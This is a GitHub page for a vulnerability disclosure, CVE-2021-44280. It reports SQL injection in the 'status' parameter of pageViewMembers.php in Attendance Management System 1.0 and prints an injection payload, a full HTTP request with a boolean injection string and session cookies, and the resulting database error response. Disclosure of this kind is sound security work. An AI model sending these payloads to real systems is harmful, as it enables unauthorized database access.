Skip to content
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
CVE-mitre/CVE-2021-44280/
CVE-mitre/CVE-2021-44280/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
PoC
 
 
 
 
 
 

CVE-2021-44280

Vendor

Description:

The status parameter from pageViewMembers.php on Attendance Management System 1.0 appears to be vulnerable to SQL injection attacks from INSIDE. The payload 011011100111010100110001001100010111001101100101011000110111010101110010001100010111010001111001%27or%271=1 was submitted in the status parameter, and a database error message was returned. The attacker can perform different attacks against the system. STATUS: Risk LOW - MEDIUM

SQl Request:

GET /Attendance-Management-System/admin/pageViewMembers.php?status=164054629%20or%204022%3d04022 HTTP/1.1
Host: 192.168.10.22
Cookie: Attendance_Management_System_rememberMe=c0e024d9200b5705bc4804722636378a; Attendance_Management_System=e8oqed0r866tojucn8g7ikd35c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Upgrade-Insecure-Requests: 1
Referer: http://192.168.10.22/Attendance-Management-System/admin/pageHome.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Connection: close
Cache-Control: max-age=0

SQL Response:

HTTP/1.1 200 OK
Date: Mon, 06 Dec 2021 11:49:03 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13970

<!DOCTYPE html>
<!--[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]> <html class="no-js lt-ie9 lt-ie8"> <![endif]-->
<!--[if IE 8]> <html cla
...[SNIP]...
<script>
               $j(function(){
                   show_notification({"message":"You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' at line 1<pre class=\"ltr\">
...[SNIP]...

Reproduce:

href

Proof and Exploit

href